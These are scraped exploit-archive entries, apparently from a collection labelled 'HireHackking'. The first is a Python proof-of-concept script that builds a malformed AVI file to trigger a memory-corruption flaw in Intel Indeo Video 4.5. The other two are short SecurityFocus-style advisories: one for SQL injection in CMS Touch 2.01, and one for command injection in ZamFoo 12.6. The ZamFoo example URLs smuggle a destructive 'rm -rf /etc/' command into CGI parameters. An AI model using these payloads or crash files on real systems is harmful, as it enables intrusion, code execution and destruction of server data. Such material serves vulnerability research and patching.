Intel Indeo Video 4.5 ir41_32.ax version 4.51.16.3 is vulnerable; other versions may also be affected. 

header1 =
"\x52\x49\x46\x46\xE8\x69\x04\x00\x41\x56\x49\x20\x4C\x49\x53\x54\xC0\x00\x00\x00\x68\x64\x72\x6C\x61\x76\x69\x68\x38\x00\x00\x00\x9B\x6F\x00\x00\x5E\x74\x01\x00\x00\x00\x00\x00\x10\x08\x00\x00\x6E\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x0C\x00\x00\x00\x01\x00\x00\xF0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x74\x00\x00\x00\x73\x74\x72\x6C\x73\x74\x72\x68\x38\x00\x00\x00\x76\x69\x64\x73\x63\x76\x69\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x23\x00\x00\x00\x00\x00\x00\x00\x6E\x00\x00\x00\x02\x0C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xF0\x00\x73\x74\x72\x66\x1F\x00\x00\x00\x28\x00\x00\x00\x00\x01\x00\x00\xF0\x00\x00\x00\x01\x00\x18\x00\x49\x56\x34\x31\x00\x1C\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4A\x55\x4E\x4B\x18\x07\x00\x00\x00\x00\x00\x00"

pattern1 = "A" * 1808

header2 =
"\x00\x00\x00\x00\x4C\x49\x53\x54\x08\x5B\x04\x00\x6D\x6F\x76\x69\x30\x30\x64\x62\x72\x07\x00\x00\xF8\xFF\x83\x70\x07\x00\x0E\x0F\x00\x10\x80\x0F\x00\x00\x86\x59\x0C\xE9\x7D\x00\x80\x17\x00\x0D\xE9\x05\x86\x40\x8B\x6C\xC0\xE0\x10\xC2\x53\xF2\xD2\x10\x61\x31\x73\x81\x03\xFE\x77\x1A\x00\x00\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9A\xE7\x79\x9E\xE7\x78\x9E\xE7\x79\x9C\xE7\x38\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE3\x79\x9E\xC7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x78\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x78\x9E\xE7\x69\x9E\xE7\x79\x9A\xE7\x69\x9A\xA7\x69\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x1E\xE7\x39\x1A\x63\x39\x1E\xE7\x79\x8E\xA7\x58\x9E\x22\x20\x9E\xE7\x79\x9A\xE7\x79\x8E\xA3\x39\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x0E\xE7\x79\x9E\xE7\x79\x9E\xE7\xF9\xF0\x1C\xCF\x72\x30\xC7\xF2\x3C\xCF\xF3\x3C\xC7\x03\x1C\x0F\x72\x18\xC0\xF3\x3C\xCF\x52\x3C\xCF\x93\x04\x4F\x23\x3C\x4E\x03\x4F\xB8\xEB\xE2\xEC\x98\x90\xED\x80\x97\xC5\xF5\x31\xB7\xCD\xDE\x71\x7C\xC0\x87\x26\x8A\x57\x13\xEF\xF1\x03\x91\x92\x53\x50\xB2\x84\x06\xFB\x11\x77\x6C\x72\xAB\x64\xF0\x9E\x57\xDD\x64\x31\x4F\x5C\xC9\x76\x44\xCA\x16\x0C\x47\xBC\xA8\x89\x65\x62\x70\xE2\xEA\x80\x17\x4E\x5C\x91\x47\xF1\xA1\x18\x94\x38\x62\x9C\xB8\x3A\x60\x97\x25\xE4\xBC\x89\x89\x60\x61\x60\x2D\x64\xD3\x3A\xC6\x22\x8A\x85\x3D\x48\x93\xB3\x20\x45\x6E\x63\xC0\xE6\x86\xE0\x93\xC4\xC8\xD9\x51\xF0\xA2\x78\x13\xC1\xA6\xBC\x22\xBA\x59\x90\x2B\xF6\x22\xEA\xC9\x23\xE1\xA5\x43\xB1\x75\x1F\xF0\x22\x12\xD3\xE2\xBD\x9D\xC4\x31\xD1\xCC\xEC\x04\x23\x43\xDF\xB3\x79\xCC\x0D\xE7\xB2\x71\xC5\x3A\x32\x07\xB2\x0E\x13\xC1\x19\xC1\x75\xC4\x78\xC0\x10\xEC\xD5\xC5\xC2\xD6\x2C\xC5\x56\xC5\x6D\xB3\x17\x6F\x46\xF2\x03\x71\xD6\xAC\x8D\xDC\x86\xDC\x10\xAC\xD5\x2C\x47\x24\x71\x4C\x70\xC5\xCC\xCE\xC0\x47\x3B\x95\x9B\xE2\xFA\x88\xA7\x44\xB1\x3F\xE2\xE9\x31\x6B\x05\x4B\x15\x83\x9C\xF1\xB0\x39\x0B\x52\xD9\x8F\x9A\xA5\x0D\x0A\xD9\x26\xF6\x9A\x70\x0D\x0A\x52\x3E\xC4\x81\x9C\xB3\xB0\xBD\x63\xE6\x8A\x5B\xD6\xC0\xE3\x63\x9E\x2E\x51\x72\x5B\x74\xCA\x56\x0C\x5C\x2B\x4B\xC9\xD5\x31\x1E\x10\x21\x73\x11\xC7\xAC\x39\x18\xE4\xC4\x4D\x61\x37\x51\x64\x61\x71\x75\xC0\xDC\x24\xC1\xCE\x80\x3C\x95\x95\xE2\x8C\xB7\xDC\x76\x31\x74\x33\x14\xB7\xDC\x18\xBC\xE4\x55\xC9\x8D\xF7\x78\xCC\xC6\x3A\x31\x7F\x10\xCE\x82\x34\x78\x75\xC0\xC2\x7B\x82\xC7\xCD\x73\xD9\x8A\x96\x39\x82\x9B\xE6\x9C\x10\xAB\x19\x8A\x6B\x79\x4F\x16\xE7\x35\xF1\xF4\x9E\x54\xA2\x58\xD9\x8A\xBD\xD8\x9A\xEB\xE6\x6C\x62\x1D\x39\x43\x6E\x8F\x39\x33\x09\xD4\x66\x61\xF7\x35\x37\x24\x51\xC4\x18\x5C\x07\x37\xB2\x94\xAC\x5C\x33\x44\x10\x13\xBF\xF1\xFC\x2A\xE6\x91\x6F\x7B\xC8\x4B\xAE\x39\xAB\xE6\x8E\x6B\x0C\x83\xBD\x82\xB3\x63\x92\xA8\xE0\x6D\x85\x3C\x2F\x0E\x82\xCB\x0E\x86\xD3\x7B\x9E\xF2\x9E\xC7\x13\x37\xD1\xEC\xC5\x36\x71\x6D\xF3\xA1\x1B\x3D\x60\xE3\x95\xD1\x6C\xC5\xDD\x01\xD9\xCD\x39\x3B\x6F\xA4\x83\x94\xFC\x40\xDC\x70\x7B\xC0\x7E\xC0\xE2\xC4\x53\x66\x86\x60\x90\x59\x79\xC3\x75\x29\x67\xBC\x65\x93\x3D\xB8\x2A\x31\x08\xB9\x0E\x39\x63\x60\x8F\xA0\x27\x26\x79\xC2\x58\x2F\x87\x18\x96\x89\x27\x9C\xD5\x11\x4F\xF8\xD0\xF9\x32\x3F\x36\x4F\x78\x91\x51\x4A\x66\x34\x77\xB1\x1A\x2C\xAE\xCA\x35\xD9\x3C\x7D\x44\x3C\x62\x2D\x6E\x27\xDE\x1F\x71\x53\xBC\x2A\x42\x79\x7A\xC4\x52\x7C\xA4\xE2\xA5\xDC\x15\x23\xAF\x8E\xC9\x91\x0F\x51\x8C\x3C\x66\x9E\xF8\x18\x45\x14\x1F\x5C\xE6\x90\x8F\x51\x8C\x3C\x66\x0B\x9B\x37\x45\x14\x8F\xAB\xB8\x29\x9E\x16\x51\x3C\x2C\x86\xE2\x8E\xE0\x96\xB9\x78\x49\xD6\x93\x47\xC2\x75\x24\x59\xBC\x27\x8B\x57\x15\xCC\xCA\xF3\x7A\xF2\x48\x08\x5E\x1D\x31\x14\x77\xBC\x28\xBE\xF7\xCD\x6D\x2C\xD1\xF2\x4B\xBC\x38\xE2\x86\xE0\xB2\xA9\x81\x8F\x80\x7C\xCC\x58\xD8\x8C\x91\x8F\x40\xF0\x09\x9B\x25\x06\x3E\x32\x1F\x37\x07\x3C\xE5\x53\x92\x3C\x6E\x66\x07\x3E\x01\xC9\xC7\x8C\x81\xA5\x47\x3E\x02\x1B\x9F\xF6\x94\x37\x11\xBC\x67\xE1\x71\x46\xB3\x36\x1F\x83\x17\x87\x5C\xF7\xC4\xC7\x40\x1E\x46\x90\xC9\x4B\x06\x3E\x78\x73\xC7\x15\xAF\x0C\x9A\x97\x5C\xCB\x79\xF3\x21\x98\x59\x39\x97\x97\xBC\x1A\x82\x2B\x36\xDE\xF6\xC4\x55\xF0\xC5\x22\x46\x79\xB8\x46\xF4\x07\x09\x3E\xF5\xD1\xC8\xE2\xCC\xE7\x8B\xE6\xCD\x6C\x68\xF0\xF1\x1F\xF1\xA6\xF8\x54\x27\x9C\x1E\xF3\x51\x8F\x38\x8B\xE4\xD3\xCD\x3F\xC5\xCC\x67\x35\xF1\x88\x8F\x59\xA3\xAC\xB3\xD3\x07\xE1\x33\x1E\x11\x47\x7C\x8A\x41\x6E\x0E\xF9\x58\x47\x64\xF1\xE9\x6A\xF2\x83\x72\x11\x3C\x2F\xCE\x8A\x4F\x31\xF7\x27\x0F\xE6\xE1\x80\x4F\x53\xE4\x11\xB7\x35\xF2\xF0\x13\xF3\xF1\x8B\xBD\xB8\x1D\x98\xE7\x03\x2E\x42\x54\x3E\x5A\x1C\x72\xC1\x56\x6C\xC5\x65\x1E\x73\xB6\x1C\xF0\xB4\x88\x90\xEB\xE4\xFA\x84\x0F\xA1\xAC\xC5\xC0\x07\x98\xF9\x08\xAC\xCA\x8B\x85\x97\x87\x0C\xC5\xC6\x47\x3B\xE1\xFD\xC0\x50\x6C\x85\xC5\x82\x0C\xC8\x80\xC8\x80\x04\x41\x12\x04\x81\xC8\xC2\xCA\xC2\x40\x22\x1B\x33\x72\x46\x32\x73\x45\xB2\x32\x30\x20\x49\x10\x04\x33\xB2\x20\xC9\x86\xC8\xC0\x5A\x0C\x0C\xBC\x20\x90\x0D\x19\x90\x60\x40\x24\x18\x08\x64\xC0\x62\x61\x60\x8D\x51\x82\x85\xAF\xEF\x30\x84\x7C\x81\x39\xC6\x89\x97\xAC\xCF\x92\xA1\x65\x23\xF8\x66\x5E\xC5\x30\x84\x1E\x46\xF8\x61\x3E\x10\x9F\x6B\x8D\x88\x63\x2E\x48\x6E\x98\x99\x49\x36\x82\x1D\xB9\x62\x27\xD8\x58\xD9\x48\x92\x60\xE1\xA3\xB5\x6C\x2D\x5F\xCA\x3A\xE6\x2E\xA2\xF9\x02\x24\x9F\xE3\x19\x37\xCD\xC7\x3A\x15\x4F\xE5\x8B\xC6\x14\xDC\xF0\x69\x4E\x25\x4E\x7D\xF2\x50\xF8\x14\x07\x87\x5C\xE5\xC4\x27\x6B\x26\x3E\x26\xD7\x27\x7C\xF6\x66\x6E\x3E\x61\x73\x96\x4E\x7C\x76\x1E\xC6\x01\x57\xBC\x8D\x2E\x3E\xA6\xF5\xE4\xA1\x70\x31\xFC\x1E\x1F\x7C\x7E\x76\x92\xCA\x47\x5D\x3E\x2C\xDF\x3B\x8E\x79\x93\x4E\xCA\xFE\x81\x4E\xF8\xA8\xAB\x1F\x9B\xF7\x73\x1E\xBF\x8B\x27\xA7\xC2\x67\x9C\xF9\x00\xBE\xE3\x63\x24\x37\x5C\x07\x03\xE7\xC3\x01\xFB\xE9\x3D\x57\xCD\xA7\x30\x78\xDA\xDC\x9D\x12\xA7\xCC\x56\xF0\xF0\x11\x1F\xE2\x14\x0D\x66\x49\x9E\x36\x73\x73\xCE\x5C\x3C\x3D\x25\x3B\xB8\x2E\x46\x3E\x6E\xB1\x73\xD6\x9C\x37\x4F\x79\x11\x15\x6C\x13\x0F\xB9\xB3\x92\x0F\x3D\x72\xE9\xCC\xD3\x52\x6E\x79\x5F\xD8\x1A\x2C\x11\x13\x59\xF8\x88\xAD\x8B\xAD\xB9\x0C\x43\xDE\xE7\x10\x1F\x94\x41\x16\xE5\x23\x13\x4E\x64\xB1\xF3\x22\xD4\x27\x0F\x84\xAB\xE1\x2B\x71\x36\x10\x1F\x8F\x6F\x51\x93\x7C\xEA\xD5\xE3\x78\xC7\x65\x55\xF0\x29\x57\x4B\x56\xAB\x0E\xF8\x0C\xC9\x27\xD4\xA1\xF8\xF8\x92\x38\xD8\x72\x46\xF3\x71\xCD\xE2\xEA\x48\xEE\x8A\x2C\xD6\x62\xE0\x86\x9D\x8D\x85\xDB\x62\x2B\xCE\x08\xF6\x62\xE6\x8E\xE0\x2B\x87\xC5\xA6\xDC\x71\xCE\x4D\x31\x72\xC8\x8B\x67\x4F\x1E\x09\x2F\x59\x63\x62\x95\x65\xE2\xFC\x88\xB3\xE2\xCC\xE4\x86\x95\x91\xF7\xC5\x56\xBC\x3A\x62\x53\xDE\x90\x0C\xDC\xBE\xE6\x8E\x9D\x2F\xBB\xDD\x2C\xFB\xF1\x3A\x84\x1F\x2A\xB3\x79\xB1\x5E\x9C\x2F\x9F\xCD\x77\xA9\x4F\xB6\x84\xEF\x86\x47\xF2\xA2\x32\xB8\x33\x8B\x1B\x02\x8B\x85\x20\x10\x59\xD8\x19\x08\x44\x06\x02\x91\x20\x90\x40\xBE\x79\x1C\x30\x38\x12\x23\xDB\x47\x24\x1D\xB1\x58\x8A\x4D\x9E\x4B\x14\xC5\x99\x32\xB2\x29\x1B\x0B\x16\x03\x03\x12\x24\x0B\x33\x2B\x12\x2C\x6C\xCC\x2C\x2C\x04\x12\x0C\x24\x81\x04\x12\x48\x10\x24\x03\xF2\x1D\x8E\x78\xCA\xC3\x68\x6E\x26\x16\x4A\x5E\x75\xF0\x34\x3B\xF8\x34\x72\xC5\x2E\x1B\x1B\x03\x03\x22\x0B\xE7\x5C\x71\xCE\xCA\xC0\xCC\xC2\x19\x41\x32\x30\x90\x6C\x04\x03\xC9\x80\x48\x20\x03\x12\x24\x03\x0D\x0A"

pattern2= "A" * 1035

data = header1+pattern1+header2+pattern2

outfile = file("poc.avi", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"
HireHackking 
source: https://www.securityfocus.com/bid/67377/info
 
CMS Touch is prone to multiple SQL-injection and cross-site scripting vulnerabilities.
 
Successful exploits could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
CMS Touch 2.01 is vulnerable; other versions may also be affected. 

http://www.example.com/cmstouch/news.php?do=show&News_ID=[SQL]
HireHackking 
source: https://www.securityfocus.com/bid/67215/info

ZamFoo is prone to multiple remote command-execution vulnerabilities.

Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.

ZamFoo 12.6 is vulnerable; other versions may also be affected. 

https://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm -rf /etc/${IFS}

https://www.example.com/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm -rf /etc/|&newip=127.0.0.1&pattern2=